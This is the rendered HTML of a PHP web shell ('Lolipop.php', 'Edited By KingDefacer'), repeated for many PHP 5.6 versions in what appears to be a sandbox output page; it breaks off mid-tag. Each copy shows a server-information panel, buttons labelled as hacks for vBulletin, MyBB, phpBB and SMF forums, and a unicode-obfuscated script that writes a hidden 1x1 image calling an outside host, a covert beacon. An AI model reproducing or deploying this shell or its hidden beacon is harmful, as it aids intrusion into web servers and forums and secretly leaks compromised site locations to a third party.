<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.30</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.29
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.29</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.28
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.28</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.27
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.27</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.26
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.26</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.25
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.25</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.24
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.24</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.23
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.23</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.22
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.22</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.21
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.21</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.20
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.20</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.19
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.19</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script 